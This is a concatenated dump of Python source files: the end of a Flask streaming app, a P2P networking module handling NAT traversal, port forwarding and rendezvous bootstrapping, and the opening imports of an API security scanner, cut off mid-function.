gen_stream(), mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == "__main__":
stop = []
task = threading.Thread(target=engine, args=(stop,))
task.start()
try:
app.run(host="0.0.0.0")
finally:
stop.append(1)
task.join()
|
net.py | """
Handles P2P connections.
All networking functions are ultimately done through
this class.
"""
import hashlib
import signal
import zlib
from ast import literal_eval
from .nat_pmp import NatPMP
from .rendezvous_client import *
from .unl import UNL
from .upnp import *
# How many times a single message can be retransmitted.
max_retransmissions = 1
# Minimum time that must pass between retransmissions.
min_retransmit_interval = 5
# A theoretical time for a message to propagate across the network.
propagation_delay = 5
# A table of message hashes for received messages.
seen_messages = {}
# How often to get new DHT messages.
dht_msg_interval = 5
# How often to re-bootstrap.
rendezvous_interval = 30 * 60
# How often to re-advertise node.
# Update bootstrapping server every 24 hours.
advertise_interval = 60 * 60 * 12
# Time that must elapse between accepting simultaneous opens.
sim_open_interval = 2
# Bootstrapping + TCP hole punching server.
rendezvous_servers = [
{
"addr": "162.243.213.95",
"port": 8000
}
]
# Web server running script to test port forwarding.
# And get WAN IP address.
forwarding_servers = [
{
"addr": "185.86.149.128",
"port": 80,
"url": "/net.php"
},
{
"addr": "185.61.148.22",
"port": 80,
"url": "/net.php"
}
]
# Debug logging.
logging.basicConfig()
log = logging.getLogger(__name__)
def is_msg_old(msg, record_seen=0):
if type(msg) == str:
msg = msg.encode("ascii")
response_hash = hashlib.sha256(msg).hexdigest()
if response_hash in seen_messages:
seen = seen_messages[response_hash]
elapsed = int(time.time()) - seen["last"]
if elapsed < min_retransmit_interval:
return 1
if seen["times"] >= max_retransmissions:
return 1
if record_seen:
record_msg_hash(msg)
return 0
def record_msg_hash(msg):
if type(msg) == str:
msg = msg.encode("ascii")
response_hash = hashlib.sha256(msg).hexdigest()
if not is_msg_old(msg):
timestamp = int(time.time())
if response_hash in seen_messages:
seen = seen_messages[response_hash]
seen["times"] += 1
seen["last"] = timestamp
else:
seen_messages[response_hash] = {
"times": 1,
"last": timestamp
}
return 1
else:
return 0
def clear_seen_messages():
global seen_messages
seen_messages = {}
class Net:
def __init__(self, net_type="p2p", nat_type="unknown", node_type="unknown",
max_outbound=10, max_inbound=10, passive_bind="0.0.0.0",
passive_port=50500, interface="default", wan_ip=None,
dht_node=None, error_log_path="error.log", debug=0,
sys_clock=None, servers=None):
# List of outbound connections (from us, to another node.)
self.outbound = []
# List of inbound connections (to us, from another node.)
self.inbound = []
# Socket to receive inbound connections on.
self.passive = None
# Type of node: simultaneous, active, passive.
self.node_type = node_type
# NAT type: preserving, delta, reuse, random.
self.nat_type = nat_type
# Address to listen() on for inbound cons.
self.passive_bind = passive_bind
# Port to listen() on for inbound cons.
self.passive_port = int(passive_port)
# How many connections can we accept from other nodes?
self.max_outbound = int(max_outbound)
# How many connections can we make to other nodes?
self.max_inbound = int(max_inbound)
# List of servers to do port forwarding checks.
self.forwarding_servers = forwarding_servers
# Unix timestamp of last bootstrap.
self.last_bootstrap = None
# Unix timestamp of last DHT direct message.
self.last_dht_msg = None
# Unix timestamp of last advertise.
self.last_advertise = None
# What interface to make outbound connections from?
self.interface = interface
# Skip advertise if we have at least this many inbound connections.
self.min_connected = 3
# Unix timestamp of last simultaneous open challenge.
self.last_passive_sim_open = 0
# Does this Net instance need to bootstrap?
self.enable_bootstrap = 1
# Does this Net instance need to advertise?
self.enable_advertise = 1
# Should we try open ports?
self.enable_forwarding = 1
# Is simultaneous open enabled?
self.enable_simultaneous = 1
# Does this Net instance reject duplicate messages
# (same hash as previous messages)?
self.enable_duplicates = 1
# Where should I store errors?
self.error_log_path = error_log_path
# Indicates port forwarding state.
self.forwarding_type = "manual"
# Debug mode shows debug messages.
self.debug = debug
# Network: p2p or direct.
self.net_type = net_type
# Calculate clock skew from NTP.
self.sys_clock = sys_clock
# List of rendezvous servers.
self.rendezvous_servers = servers or rendezvous_servers
# Rendezvous / boostrapping client.
self.rendezvous = RendezvousClient(
self.nat_type, rendezvous_servers=self.rendezvous_servers,
interface=self.interface,
sys_clock=self.sys_clock
)
# DHT node for receiving direct messages from other nodes.
self.dht_node = dht_node
# DHT messages received from DHT.
self.dht_messages = []
# Subscribes to certain messages from DHT.
# Todo: move status messages to file transfer client
def build_dht_msg_handler():
def dht_msg_handler(node, msg):
self.debug_print("DHT msg handler in Net")
valid_needles = [
'^REVERSE_CONNECT',
'^REVERSE_QUERY',
'^REVERSE_ORIGIN',
"""u?("|')status("|')(:|,)\s+u?("|')SYN("|')""",
"""u?("|')status("|')(:|,)\s+u?("|')SYN-ACK("|')""",
"""u?("|')status("|')(:|,)\s+u?("|')ACK("|')""",
"""u?("|')status("|')(:|,)\s+u?("|')RST("|')""",
]
# Convert zlib packed binary to Python object.
self.debug_print("In net dht" + str(type(msg)))
if type(msg) == type(b""):
try:
msg = literal_eval(zlib.decompress(msg))
except:
pass
# Encode result to unicode for RE checks.
"""
If buffer errors result: enable this.
try:
if sys.version_info >= (3, 0, 0):
if type(msg) == bytes:
msg = msg.decode("utf-8")
else:
if type(msg) == str:
msg = unicode(msg)
except:
return
"""
# Check for matches.
for needle in valid_needles:
if re.search(needle, str(msg)) is not None:
msg = {
u"message": msg,
u"source": None
}
self.dht_messages.append(msg)
return
return dht_msg_handler
# Add message handler to DHT for our messages.
self.dht_msg_handler = build_dht_msg_handler()
if self.dht_node is not None:
self.dht_node.add_message_handler(self.dht_msg_handler)
# External IP of this node.
self.wan_ip = wan_ip or get_wan_ip()
# Node type details only known after network is start()ed.
self.unl = None
# List of connections that still need to respond to
# our reverse query.
self.pending_reverse_queries = []
# Time frame for connection to respond to reverse query.
self.reverse_query_expiry = 60
# Enable more than one connection to the same IP.
self.enable_duplicate_ip_cons = 0
# Net instances hide their con details to prioritise direct cons.
if self.net_type == "direct":
self.disable_bootstrap()
self.enable_duplicate_ip_cons = 1
# Set to 1 when self.start() has been called.
self.is_net_started = 0
# Start synchronize thread.
# t = Thread(target=self.synchronize_loop)
# t.setDaemon(True)
# t.start()
def synchronize_loop(self):
while 1:
if self.is_net_started:
self.synchronize()
time.sleep(5)
def debug_print(self, msg):
log.debug(str(msg))
def disable_duplicates(self):
self.enable_duplicates = 0
def disable_bootstrap(self):
self.enable_bootstrap = 0
def disable_advertise(self):
self.enable_advertise = 0
def disable_simultaneous(self):
self.enable_simultaneous = 0
def disable_forwarding(self):
self.enable_forwarding = 0
def get_connection_no(self):
return len(self.outbound) + len(self.inbound)
# Used to reject duplicate connections.
def validate_node(self, node_ip, node_port=None, same_nodes=1):
self.debug_print("Validating: " + node_ip)
# Is this a valid IP?
if not is_ip_valid(node_ip) or node_ip == "0.0.0.0":
self.debug_print("Invalid node ip in validate node")
return 0
# Is this a valid port?
if node_port != 0 and node_port is not None:
if not is_valid_port(node_port):
self.debug_print("Invalid node port in validate port")
return 0
"""
Don't accept connections from self to passive server
or connections to already connected nodes.
"""
if not self.enable_duplicate_ip_cons:
# Don't connect to ourself.
if (node_ip == "127.0.0.1" or
node_ip == get_lan_ip(self.interface) or
node_ip == self.wan_ip):
self.debug_print("Cannot connect to ourself.")
return 0
# No, really: don't connect to ourself.
if node_ip == self.passive_bind and node_port == self.passive_port:
self.debug_print("Error connecting to same listen server.")
return 0
# Don't connect to same nodes.
if same_nodes:
for node in self.outbound + self.inbound:
try:
addr, port = node["con"].s.getpeername()
if node_ip == addr:
self.debug_print("Already connected to this node.")
return 0
except Exception as e:
print(e)
return 0
return 1
# Make an outbound con to a passive or simultaneous node.
def add_node(self, node_ip, node_port, node_type, timeout=5):
# Correct type for port.
node_port = int(node_port)
# Debug info.
msg = "Attempting to connect to %s:%s:%s" % (
node_ip, str(node_port), node_type
)
self.debug_print(msg)
# Already connected to them.
con = None
try:
if not self.enable_duplicate_ip_cons:
for node in self.outbound + self.inbound:
if node_ip == node["ip"]:
self.debug_print("Already connected.")
con = node["con"]
return con
# Avoid connecting to ourself.
if not self.validate_node(node_ip, node_port):
self.debug_print("Validate node failed.")
return None
# Make a simultaneous open connection.
if node_type == "simultaneous" and self.enable_simultaneous:
# Check they've started net first
# If they haven't we won't know the NAT details / node type.
if not self.is_net_started:
raise Exception("Make sure to start net before you add"
" node.")
if self.nat_type in self.rendezvous.predictable_nats:
# Attempt to make active simultaneous connection.
old_timeout = self.rendezvous.timeout
try:
self.rendezvous.timeout = timeout
self.debug_print("Attempting simultaneous challenge")
con = self.rendezvous.simultaneous_challenge(
node_ip, node_port, "TCP"
)
except Exception as e:
self.debug_print("sim challenge failed")
error = parse_exception(e)
self.debug_print(error)
log_exception(self.error_log_path, error)
return None
self.rendezvous.timeout = old_timeout
# Record node details and return con.
self.rendezvous.simultaneous_cons = []
if con is not None:
node = {
"con": con,
"type": "simultaneous",
"ip": node_ip,
"port": 0
}
self.outbound.append(node)
self.debug_print("SUCCESS")
else:
self.debug_print("FAILURE")
# Passive outbound -- easiest to connect to.
if node_type == "passive":
try:
# Try connect to passive server.
con = Sock(node_ip, node_port, blocking=0,
timeout=timeout, interface=self.interface)
node = {
"con": con,
"type": "passive",
"ip": node_ip,
"port": node_port
}
self.outbound.append(node)
self.debug_print("SUCCESS")
except Exception as e:
self.debug_print("FAILURE")
error = parse_exception(e)
self.debug_print(error)
log_exception(self.error_log_path, error)
return None
# Return new connection.
return con
finally:
# Remove undesirable messages from replies.
# Save message: 0 = no, 1 = yes.
def filter_msg_check_builder():
def filter_msg_check(msg):
# Allow duplicate replies?
record_seen = not self.enable_duplicates
# Check if message is old.
return not is_msg_old(msg, record_seen)
return filter_msg_check
# Patch sock object to reject duplicate replies
# If it's enabled.
if con is not None:
con.reply_filter = filter_msg_check_builder()
def bootstrap(self):
"""
When the software is first started, it needs to retrieve
a list of nodes to connect to the network to. This function
asks the server for N nodes which consists of at least N
passive nodes and N simultaneous nodes. The simultaneous
nodes are prioritized if the node_type for the machine
running this software is simultaneous, with passive nodes
being used as a fallback. Otherwise, the node exclusively
uses passive nodes to bootstrap.
This algorithm is designed to preserve passive node's
inbound connection slots.
"""
# Disable bootstrap.
if not self.enable_bootstrap:
return None
# Avoid raping the rendezvous server.
t = time.time()
if self.last_bootstrap is not None:
if t - self.last_bootstrap <= rendezvous_interval:
self.debug_print("Bootstrapped recently")
return None
self.last_bootstrap = t
self.debug_print("Searching for nodes to connect to.")
try:
connection_slots = self.max_outbound - (len(self.outbound))
if connection_slots > 0:
# Connect to rendezvous server.
rendezvous_con = self.rendezvous.server_connect()
# Retrieve random nodes to bootstrap with.
rendezvous_con.send_line("BOOTSTRAP " +
str(self.max_outbound * 2))
choices = rendezvous_con.recv_line(timeout=2)
if choices == "NODES EMPTY":
rendezvous_con.close()
self.debug_print("Node list is empty.")
return self
else:
self.debug_print("Found node list.")
# Parse node list.
choices = re.findall("(?:(p|s)[:]([0-9]+[.][0-9]+[.][0-9]+[.][0-9]+)[:]([0-9]+))+\s?", choices)
rendezvous_con.s.close()
# Attempt to make active simultaneous connections.
passive_nodes = []
for node in choices:
# Out of connection slots.
if not connection_slots:
break
# Add to list of passive nodes.
node_type, node_ip, node_port = node
self.debug_print(str(node))
if node_type == "p":
passive_nodes.append(node)
# Use passive to make up the remaining cons.
i = 0
while i < len(passive_nodes) and connection_slots > 0:
node_type, node_ip, node_port = passive_nodes[i]
con = self.add_node(node_ip, node_port, "passive")
if con is not None:
connection_slots -= 1
self.debug_print("Con successful.")
else:
self.debug_print("Con failed.")
i += 1
except Exception as e:
self.debug_print("Unknown error in bootstrap()")
error = parse_exception(e)
log_exception(self.error_log_path, error)
return self
def advertise(self):
"""
This function tells the rendezvous server that our node is ready to
accept connections from other nodes on the P2P network that run the
bootstrap function. It's only used when net_type == p2p
"""
# Advertise is disabled.
if not self.enable_advertise:
self.debug_print("Advertise is disbled!")
return None
# Direct net server is reserved for direct connections only.
if self.net_type == "direct" and self.node_type == "passive":
return None
# Net isn't started!.
if not self.is_net_started:
raise Exception("Please call start() before you call advertise()")
# Avoid raping the rendezvous server with excessive requests.
t = time.time()
if self.last_advertise is not None:
if t - self.last_advertise <= advertise_interval:
return None
if len(self.inbound) >= self.min_connected:
return None
self.last_advertise = t
# Tell rendezvous server to list us.
try:
# We're a passive node.
if self.node_type == "passive" and\
self.passive_port is not None and\
self.enable_advertise:
self.rendezvous.passive_listen(self.passive_port,
self.max_inbound)
"""
Simultaneous open is only used as a fail-safe for connections to
nodes on the direct_net and only direct_net can list itself as
simultaneous so its safe to leave this enabled.
"""
if self.node_type == "simultaneous":
self.rendezvous.simultaneous_listen()
except Exception as e:
error = parse_exception(e)
log_exception(self.error_log_path, error)
return self
def determine_node(self):
"""
Determines the type of node based on a combination of forwarding
reachability and NAT type.
"""
# Manually set node_type as simultaneous.
if self.node_type == "simultaneous":
if self.nat_type != "unknown":
return "simultaneous"
# Get IP of binding interface.
unspecific_bind = ["0.0.0.0", "127.0.0.1", "localhost"]
if self.passive_bind in unspecific_bind:
lan_ip = get_lan_ip(self.interface)
else:
lan_ip = self.passive_bind
# Passive node checks.
if lan_ip is not None \
and self.passive_port is not None and self.enable_forwarding:
self.debug_print("Checking if port is forwarded.")
# Check port isn't already forwarded.
if is_port_forwarded(lan_ip, self.passive_port, "TCP",
self.forwarding_servers):
msg = "Port already forwarded. Skipping NAT traversal."
self.debug_print(msg)
self.forwarding_type = "forwarded"
return "passive"
else:
self.debug_print("Port is not already forwarded.")
# Most routers.
try:
self.debug_print("Trying UPnP")
UPnP(self.interface).forward_port("TCP", self.passive_port,
lan_ip)
if is_port_forwarded(lan_ip, self.passive_port, "TCP",
self.forwarding_servers):
self.forwarding_type = "UPnP"
self.debug_print("Forwarded port with UPnP.")
else:
self.debug_print("UPnP failed to forward port.")
except Exception as e:
# Log exception.
error = parse_exception(e)
log_exception(self.error_log_path, error)
self.debug_print("UPnP failed to forward port.")
# Apple devices.
try:
self.debug_print("Trying NATPMP.")
NatPMP(self.interface).forward_port("TCP",
self.passive_port,
lan_ip)
if is_port_forwarded(lan_ip, self.passive_port, "TCP",
self.forwarding_servers):
self.forwarding_type = "NATPMP"
self.debug_print("Port forwarded with NATPMP.")
else:
self.debug_print("Failed to forward port with NATPMP.")
self.debug_print("Falling back on TCP hole punching or"
" proxying.")
except Exception as e:
# Log exception
error = parse_exception(e)
log_exception(self.error_log_path, error)
self.debug_print("Failed to forward port with NATPMP.")
# Check it worked.
if self.forwarding_type != "manual":
return "passive"
# Fail-safe node types.
if self.nat_type != "unknown":
return "simultaneous"
else:
return "active"
# Receive inbound connections.
def start_passive_server(self):
self.passive = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.passive.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.passive.bind((self.passive_bind, self.passive_port))
self.passive.listen(self.max_inbound)
# Check bound local port.
if not self.passive_port:
self.passive_port = self.passive.getsockname()[1]
def start(self):
"""
This function determines node and NAT type, saves connectivity details,
and starts any needed servers to be a part of the network. This is
usually the first function called after initialising the Net class.
"""
self.debug_print("Starting networking.")
self.debug_print("Make sure to iterate over replies if you need"
" connection alive management!")
# Register a cnt + c handler
signal.signal(signal.SIGINT, self.stop)
# Save WAN IP.
self.debug_print("WAN IP = " + str(self.wan_ip))
# Check rendezvous server is up.
try:
rendezvous_con = self.rendezvous.server_connect()
rendezvous_con.close()
except:
raise Exception("Unable to connect to rendezvous server.")
# Started no matter what
# since LAN connections are always possible.
self.start_passive_server()
# Determine NAT type.
if self.nat_type == "unknown":
self.debug_print("Determining NAT type.")
nat_type = self.rendezvous.determine_nat()
if nat_type is not None and nat_type != "unknown":
self.nat_type = nat_type
self.rendezvous.nat_type = nat_type
self.debug_print("NAT type = " + nat_type)
else:
self.debug_print("Unable to determine NAT type.")
# Check NAT type if node is simultaneous
# is manually specified.
if self.node_type == "simultaneous":
if self.nat_type not in self.rendezvous.predictable_nats:
self.debug_print("Manual setting of simultanous specified but"
" ignored since NAT does not support it.")
self.node_type = "active"
else:
# Determine node type.
self.debug_print("Determining node type.")
# No checks for manually specifying passive
# (there probably should be.)
if self.node_type == "unknown":
self.node_type = self.determine_node()
# Prevent P2P nodes from running as simultaneous.
if self.net_type == "p2p":
"""
TCP hole punching is reserved specifically for direct networks
(a net object reserved for receiving direct connections
-- p2p is for connecting to the main network. The reason for this
is you can't do multiple TCP hole punches at the same time so
reserved for direct network where it's most needed.
"""
if self.node_type == "simultaneous":
self.debug_print("Simultaneous is not allowed for P2P")
self.node_type = "active"
self.disable_simultaneous()
self.debug_print("Node type = " + self.node_type)
# Close stray cons from determine_node() tests.
self.close_cons()
# Set net started status.
self.is_net_started = 1
# Initialise our UNL details.
self.unl = UNL(
net=self,
dht_node=self.dht_node,
wan_ip=self.wan_ip
)
# Nestled calls.
return self
def stop(self, signum=None, frame=None):
self.debug_print("Stopping networking.")
if self.passive is not None:
try:
self.passive.shutdown(1)
except:
pass
self.passive.close()
self.passive = None
if self.last_advertise is not None:
self.rendezvous.leave_fight()
"""
Just let the threads timeout by themselves.
Otherwise mutex deadlocks could occur.
for unl_thread in self.unl.unl_threads:
unl_thread.exit()
"""
for con in self:
con.close()
if signum is not None:
raise Exception("Process was interrupted.")
# Return a connection that matches a remote UNL.
def con_by_unl(self, unl, cons=None):
if cons is None:
cons = self.outbound + self.inbound
for con in cons:
if not isinstance(con, Sock):
con = con["con"]
if con.unl is not None:
self.debug_print("CMP")
self.debug_print(unl)
self.debug_print(con.unl)
if unl == con.unl:
# Connection not ready.
if con.nonce is None and self.net_type == "direct":
continue
return con
else:
self.debug_print("\a")
self.debug_print("Con UNL is None (in con by unl)")
self.debug_print(cons)
return None
# Return a connection by its IP.
def con_by_ip(self, ip):
for node in self.outbound + self.inbound:
# Used to block UNLs until nonces are received.
# Otherwise they might try do I/O and ruin their protocols.
if self.net_type == "direct":
if node["con"].nonce is None and self.net_type == "direct":
continue
if node["ip"] == ip:
return node["con"]
return None
def generate_con_id(self, nonce, their_wan_ip, our_wan_ip):
# Convert WAN IPs to bytes.
if sys.version_info >= (3, 0, 0):
if type(their_wan_ip) == str:
their_wan_ip = their_wan_ip.encode("ascii")
if type(our_wan_ip) == str:
our_wan_ip = our_wan_ip.encode("ascii")
else:
if type(their_wan_ip) == unicode:
their_wan_ip = str(their_wan_ip)
if type(our_wan_ip) == our_wan_ip:
our_wan_ip = str(our_wan_ip)
# Hash WAN IPs to make them the same length.
their_wan_ip = hashlib.sha256(their_wan_ip).hexdigest().encode("ascii")
our_wan_ip = hashlib.sha256(our_wan_ip).hexdigest().encode("ascii")
# Derive fingerprint.
int_their_wan_ip = int(their_wan_ip, 16)
int_our_wan_ip = int(our_wan_ip, 16)
if int_our_wan_ip > int_their_wan_ip:
fingerprint = hashlib.sha256(our_wan_ip + their_wan_ip)
else:
# If both are the same the order doesn't matter.
fingerprint = hashlib.sha256(their_wan_ip + our_wan_ip)
fingerprint = fingerprint.hexdigest().encode("ascii")
# Convert nonce to bytes.
if sys.version_info >= (3, 0, 0):
if type(nonce) == str:
nonce = nonce.encode("ascii")
else:
if type(nonce) == unicode:
nonce = str(nonce)
# Generate con ID.
con_id = hashlib.sha256(nonce + fingerprint).hexdigest()
# Convert to unicode.
if sys.version_info >= (3, 0, 0):
if type(con_id) == bytes:
con_id = con_id.decode("utf-8")
else:
if type(con_id) == str:
con_id = unicode(con_id)
# Return con ID.
return con_id
def con_by_id(self, expected_id):
for node in self.outbound + self.inbound:
# Nothing to test.
if node["con"].nonce is None and self.net_type == "direct":
self.debug_print("Nonce not set")
continue
# Generate con_id from con.
try:
their_wan_ip, junk = node["con"].s.getpeername()
except:
continue
if is_ip_private(their_wan_ip):
our_wan_ip = get_lan_ip(self.interface)
else:
our_wan_ip = self.wan_ip
found_id = self.generate_con_id(
node["con"].nonce,
their_wan_ip,
our_wan_ip
)
# Check result.
if found_id == expected_id:
return node["con"]
return None
# Send a message to all currently established connections.
def broadcast(self, msg, source_con=None):
for node in self.outbound + self.inbound:
if node["con"] != source_con:
node["con"].send_line(msg)
def close_cons(self):
# Close all connections.
for node in self.inbound + self.outbound:
node["con"].close()
# Flush client queue for passive server.
if self.node_type == "passive" and self.passive is not None:
self.passive.close()
self.start_passive_server()
# Start from scratch.
self.inbound = []
self.outbound = []
def synchronize(self):
# Clean up dead connections.
for node_list_name in ["self.inbound", "self.outbound"]:
node_list = eval(node_list_name)[:]
for node in node_list:
if not node["con"].connected:
self.debug_print("\a")
self.debug_print("Removing disconnected: " + str(node))
eval(node_list_name).remove(node)
# Timeout connections that haven't responded to reverse query.
old_reverse_queries = []
for reverse_query in self.pending_reverse_queries:
duration = time.time() - reverse_query["timestamp"]
if duration >= self.reverse_query_expiry:
reverse_query["con"].close()
old_reverse_queries.append(reverse_query)
# Remove old reverse queries.
for reverse_query in old_reverse_queries:
self.pending_reverse_queries.remove(reverse_query)
# Get connection nonce (for building IDs.)
if self.net_type == "direct":
for node in self.inbound + self.outbound:
if node["con"].nonce is not None:
continue
# Receive nonce part.
if len(node["con"].nonce_buf) < 64:
assert(node["con"].blocking != 1)
remaining = 64 - len(node["con"].nonce_buf)
nonce_part = node["con"].recv(remaining)
if len(nonce_part):
node["con"].nonce_buf += nonce_part
# Set nonce.
if len(node["con"].nonce_buf) == 64:
node["con"].nonce = node["con"].nonce_buf
# Check for reverse connect requests.
if self.dht_node is not None and self.net_type == "direct":
# Don't do this every synch cycle.
t = time.time()
skip_dht_check = 0
if self.last_dht_msg is not None:
if t - self.last_dht_msg > dht_msg_interval:
skip_dht_check = 1
if not skip_dht_check and len(self.dht_messages):
processed = []
for dht_response in self.dht_messages:
# Found reverse connect request.
msg = str(dht_response["message"])
if re.match("^REVERSE_CONNECT:[a-zA-Z0-9+/-=_\s]+:[a-fA-F0-9]{64}$", msg) is not None:
# Process message.
self.debug_print(str(msg))
call, their_unl, nonce = msg.split(":")
their_unl = UNL(value=their_unl).deconstruct()
our_unl = UNL(value=self.unl.value).deconstruct()
node_id = their_unl["node_id"]
# Are we already connected.
is_connected = False
if nonce == "0" * 64:
# Use LAN IPs.
their_ip = their_unl["wan_ip"]
our_ip = our_unl["wan_ip"]
if their_ip == our_ip:
their_ip = their_unl["lan_ip"]
our_ip = our_unl["lan_ip"]
# Get con ID.
con_id = self.generate_con_id(
nonce,
their_ip,
our_ip
)
# Find con if it exists.
if self.con_by_id(con_id) is not None:
is_connected = True
else:
if self.con_by_unl(their_unl) is not None:
is_connected = True
# Skip if already connected.
if is_connected:
processed.append(dht_response)
continue
# Ask if the source sent it.
def success_builder():
def success(con):
# Indicate status.
self.debug_print("Received reverse connect"
" notice")
self.debug_print(nonce)
# Did you send this?
query = "REVERSE_QUERY:" + self.unl.value
self.dht_node.repeat_relay_message(node_id,
query)
# Record pending query state.
query = {
"unl": their_unl["value"],
"con": con,
"timestamp": time.time()
}
self.pending_reverse_queries.append(query)
return success
self.debug_print("Attempting to do reverse connect")
self.unl.connect(their_unl["value"],
{"success": success_builder()},
nonce=nonce)
processed.append(dht_response)
# Found reverse query (did you make this?)
elif re.match("^REVERSE_QUERY:[a-zA-Z0-9+/-=_\s]+$", msg)\
is not None:
# Process message.
self.debug_print("Received reverse query")
call, their_unl = msg.split(":")
their_unl = UNL(value=their_unl).deconstruct()
node_id = their_unl["node_id"]
# Do we know about this?
if their_unl["value"] not in \
self.unl.pending_reverse_con:
self.debug_print(their_unl)
self.debug_print(str(self.unl.pending_reverse_con))
self.debug_print("oops, we don't know about this"
" reverse query!")
processed.append(dht_response)
continue
else:
self.unl.pending_reverse_con.remove(
their_unl["value"])
# Send query.
query = "REVERSE_ORIGIN:" + self.unl.value
self.dht_node.repeat_relay_message(node_id, query)
processed.append(dht_response)
# Found reverse origin (yes I made this.)
elif re.match("^REVERSE_ORIGIN:[a-zA-Z0-9+/-=_\s]+$", msg) \
is not None:
self.debug_print("Received reverse origin")
for reverse_query in self.pending_reverse_queries:
pattern = "^REVERSE_ORIGIN:" + reverse_query["unl"]
pattern += "$"
if re.match(pattern, msg) is not None:
self.debug_print("Removing pending reverse"
" query: success!")
self.pending_reverse_queries.remove(
reverse_query)
processed.append(dht_response)
# Remove processed messages.
for msg in processed:
self.debug_print(msg)
self.dht_messages.remove(msg)
self.last_dht_msg = t
# Accept inbound connections.
if len(self.inbound) < self.max_inbound:
# Accept new passive inbound connections.
if self.passive is not None:
r, w, e = select.select([self.passive], [], [], 0)
for s in r:
if s == self.passive:
# Accept a new con from the listen queue.
client, address = self.passive.accept()
con = Sock(blocking=0)
con.set_sock(client)
node_ip, node_port = con.s.getpeername()
# Reject duplicate connections.
if self.validate_node(node_ip, node_port):
try:
node = {
"type": "accept",
"con": con,
"ip": con.s.getpeername()[0],
"port": con.s.getpeername()[1],
}
self.inbound.append(node)
self.debug_print(
"Accepted new passive connection: " +
str(node))
except:
log.debug("con.s.get")
else:
self.debug_print("Validation failure")
con.close()
# Accept new passive simultaneous connections.
if self.node_type == "simultaneous":
"""
This is basically the code that passive simultaneous
nodes periodically call to parse any responses from the
Rendezvous Server which should hopefully be new
requests to initiate hole punching from active
simultaneous nodes.
If a challenge comes in, the passive simultaneous
node accepts the challenge by giving details to the
server for the challenging node (active simultaneous)
to complete the simultaneous open.
"""
# try:
t = time.time()
if self.rendezvous.server_con is not None:
for reply in self.rendezvous.server_con:
# Reconnect.
if re.match("^RECONNECT$", reply) is not None:
if self.enable_advertise:
self.rendezvous.simultaneous_listen()
continue
# Find any challenges.
# CHALLENGE 192.168.0.1 50184 50185 50186 50187 TCP
parts = re.findall("^CHALLENGE ([0-9]+[.][0-9]+[.][0-9]+[.][0-9]+) ((?:[0-9]+\s?)+) (TCP|UDP)$", reply)
if not len(parts):
continue
(candidate_ip, candidate_predictions, candidate_proto)\
= parts[0]
self.debug_print("Found challenge")
self.debug_print(parts[0])
# Already connected.
if not self.validate_node(candidate_ip):
self.debug_print("validation failed")
continue
# Last meeting was too recent.
if t - self.last_passive_sim_open < sim_open_interval:
continue
# Accept challenge.
if self.sys_clock is not None:
origin_ntp = self.sys_clock.time()
else:
origin_ntp = get_ntp()
if origin_ntp is None:
continue
msg = "ACCEPT %s %s TCP %s" % (
candidate_ip,
self.rendezvous.predictions,
str(origin_ntp)
)
ret = self.rendezvous.server_con.send_line(msg)
if not ret:
continue
"""
Adding threading here doesn't work because Python's
fake threads and the act of starting a thread ruins
the timing between code synchronisation - especially
code running on the same host or in a LAN. Will
compensate by reducing the NTP delay to have the
meetings occur faster and setting a limit for meetings
to occur within the same period.
"""
# Walk to fight and return holes made.
self.last_passive_sim_open = t
con = self.rendezvous.attend_fight(
self.rendezvous.mappings, candidate_ip,
candidate_predictions, origin_ntp
)
if con is not None:
try:
node = {
"type": "simultaneous",
"con": con,
"ip": con.s.getpeername()[0],
"port": con.s.getpeername()[1],
}
self.inbound.append(node)
except:
log.debug(str(e))
pass
# Create new predictions ready to accept next client.
self.rendezvous.simultaneous_cons = []
if self.enable_advertise:
self.rendezvous.simultaneous_listen()
# QUIT - remove us from bootstrapping server.
if len(self.inbound) == self.max_inbound:
try:
# Remove advertise.
self.rendezvous.leave_fight()
except:
pass
# Bootstrap again if needed.
self.bootstrap()
# Relist node again if noded.
self.advertise()
"""
These functions here make the class behave like a list. The
list is a collection of connections (inbound) + (outbound.)
Every iteration also has the bonus of reaping dead connections,
making new ones (if needed), and accepting connections
"""
def __len__(self):
self.synchronize()
return len(self.inbound) + len(self.outbound)
def __iter__(self):
# Process connections.
self.synchronize()
# Copy all connections to single buffer.
cons = []
for node in self.inbound + self.outbound:
if node["con"].nonce is None:
if self.net_type == "direct":
continue
cons.append(node["con"])
# Return all cons.
return iter(cons)
if __name__ == "__main__":
"""
net = Net(debug=1)
net.disable_bootstrap()
net.disable_advertise()
net.disable_forwarding()
net.start()
print(net.unl.value)
print(net.unl.deconstruct(net.unl.value))
while 1:
time.sleep(0.5)
# Test simultaneous open.
p2p_net = Net(debug=1, nat_type="preserving", node_type="simultaneous")
p2p_net.start()
p2p_net.disable_advertise()
p2p_net.disable_bootstrap()
# p2p_net.add_node("192.187.97.131", 0, "simultaneous") # Behind NAT
def success_notify(con):
print("SUCCESS THREADING.")
#Test UNL
events = {
"success": success_notify
}
while 1:
time.sleep(0.5)
exit()
#P2P network example.
p2p_net = Net(debug=1)
p2p_net.start()
p2p_net.bootstrap()
p2p_net.advertise()
#Event loop.
while 1:
for con in p2p_net:
for reply in con:
print(reply)
Excluses con from broadcast since we got this message from them
p2p_net.broadcast("Something.", con)
time.sleep(0.5)
#Direct network example.
dht_node = DHT()
direct_net = Net(dht_node=dht_node, debug=1)
direct_net.start()
#Connect to some UNL.
def success(con):
con.send_line("Thanks.")
#Note: this isn't a valid UNL.
#To get your UNL do: direct_net.unl.value.
direct_net.unl.connect("Some guys UNL...", {"success": success})
"""
|
astra.py | import argparse
import base64
import json
import requests
import time
import ast
import utils.logger as logger
import utils.logs as logs
import urlparse
from core.zapscan import *
from core.parsers import *
from utils.logger import *
from core.login import APILogin
from utils.logger import logger
from utils.config import update_value,get_value,get_allvalues
from modules.cors import cors_main
from modules.auth import auth_check
from modules.rate_limit import rate_limit
from modules.csrf import csrf_check
from modules.jwt_attack import jwt_check
from modules.sqli import sqli_check
from modules.xss import xss_check
from modules.redirect import open_redirect_check
from core.zap_config import zap_start
from multiprocessing import Process
from utils.db import Database_update
dbupdate = Database_update()
def parse_collection(collection_name,collection_type):
if collection_type == 'Postman':
parse_data.postman_parser(collection_name)
elif collection_type == 'Swagger':
print collection_type
else:
print "[-]Failed to Parse collection"
sys.exit(1)
def add_headers(headers):
# This function deals with adding custom header and auth value .
get_auth = get_value('config.property','login','auth_type')
if get_auth == 'cookie':
cookie = get_value('config.property','login','auth')
cookie_dict = ast.literal_eval(cookie)
